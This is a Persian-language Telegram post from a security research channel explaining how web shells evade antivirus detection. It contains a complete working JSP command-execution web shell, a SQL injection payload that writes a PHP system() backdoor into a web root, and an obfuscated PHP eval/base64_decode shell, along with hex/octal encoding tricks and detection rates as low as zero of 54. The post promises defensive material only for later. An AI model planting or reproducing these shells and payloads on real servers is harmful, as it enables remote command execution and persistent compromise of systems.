NEW BOT Телеграм, страница

321 views14:50

وب‌شل‌ها ابزار مدیریت و Post Exploitation مهاجمین تحت وب است. آن‌ها می‌توانند با وب‌شل‌ بسیار سریعتر و بهینه‌تر به اجزای سرورها دسترسی داشته و عملیات خود را انجام دهند.
همانطور که می‌دانید وب‌شل‌ها تغییر چندانی در ماهیت خود از چند سال پیش نداشته‌اند، اما به مرور سیاست‌های جلوگیری از تشخیص در آن‌ها به‌کار گرفته شده است.

۱. استفاده از فناوری JSP در کنار استفاده از فناوری‌های Web2:
‍‍

<%@ page import="java.util.*,java.io.*"%>

<html>

  <body>

    <form method="GET" name="offsec.ir" action="">

      <input type="text" name="cmd">

      <input type="submit" value="Send">

    </form>

    <pre>

<%

        if (request.getParameter("cmd") != null)

          out.println("Command: " + request.getParameter("cmd") + "<br>");

          Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));

          OutputStream os = p.getOutputStream();

          InputStream in = p.getInputStream();

          DataInputStream dis = new DataInputStream(in);

          String disr = dis.readLine();

          while ( disr != null )

            out.println(disr);

            disr = dis.readLine();

%>

    </pre>

  </body>

</html>

که هم‌اکنون نیز مشاهده می‌کنید (goo.gl/PE6ZC0) میزان شناخت این وب‌شل توسط ضدویروس‌ها ۲ از ۵۴ بوده است.

۲. استفاده از توابع خطرناک در میانه‌ی کدها و عملیات روتین تحت وب:

UNION SELECT NULL,"<? system($_REQUEST['cmd']); ?>", NULL INTO OUTFILE "/var/www/offsec.ir/webshell.php" —

که بدیهی است یک دستور SQL به جهت جا انداختن یک پشت‌دری (Backdoor) درون یک فایل می‌باشد. البته برای این مورد مهاجم باید یک آسیب‌پذیری SQL Injection یافت کند.

میزان شناخت این مورد توسط ضدویروس‌ها، صفر از ۵۴ بوده است!

۳. یکی از مزایای مبهم‌سازی (Obfuscation) کدها برای حملات تحت وب، استفاده از الگوریتم‌ها و ترکیبات ناشناخته‌ی آن جهت مقابله با IDS/IPS ها، ضدویروس‌ها، Firewallها و دیگر ابزارهای شناخت وب‌شل‌ است. در این مورد قصد داریم یک الگوریتم ترکیبی را به شما نمایش دهیم تا درک کنید چقدر دورزدن ضدویروس‌ها می‌تواند آسان باشد:

<?php

/*

@offscmag – offsec.ir

Obfuscation provided by FOPO - Free Online PHP Obfuscator

Checksum: e5a931bb23bbcc2dbf286decc8e2b2b72a7d9b0b

*/ $g2a594c0="\x62\x61\163\145\66\64\137\144\145\143\157\144\145";@eval($g2a594c0( "Ly9Oc044UThBMCtXVVJ6NytPQ2VkU0lGeFczNEwrR1NZVlJnZHN5M1pKK01mSXRJUkRYeU1OOGR2RX

این قسمتی از یک وب‌شل مبهم‌سازی‌شده توسط ابزار رایگان و آنلاین FOPO می‌باشد که میزان شناخت آن توسط ضدویرس‌ها صفر از ۵۴ بوده است! (goo.gl/9JznXu)

ممکن است در نگاه اول کمی عجیب بوده باشد اما محتوای شفاف آن به شکل زیر است:

$g2a594c0=”base64_decode”;

@eval($g2a594c0(“…”);

تنها تفاوت آن با دیگر ابزارهای مبهم‌سازی این است که رشته‌ی “base64_decode” را چطور رمزگذاری (Encode)‌ می‌کند.
نمونه‌هایی از آن به این صورت است:

$ueafa759="\x62\141\163\x65\66\64\x5f\x64\x65\143\x6f\x64\145";

$c03a9f9c="\142\141\163\145\x36\64\x5f\x64\x65\x63\157\x64\x65";

$p44aaf5f="\x62\141\163\145\66\64\x5f\x64\145\143\x6f\x64\x65";

توجه می‌کنید که هر کدام از مقادیر یک ترکیب متفاوت از مقادیر Hex و Octal دیگری است! به همین سادگی.
در پست‌های آینده ان‌شاالله با روش‌های شناخت و جلوگیری بهینه و مدرن این سری از عملیات آشنا خواهید شد.
گروه پژوهشی آفسک
@offsecmag

126 views06:39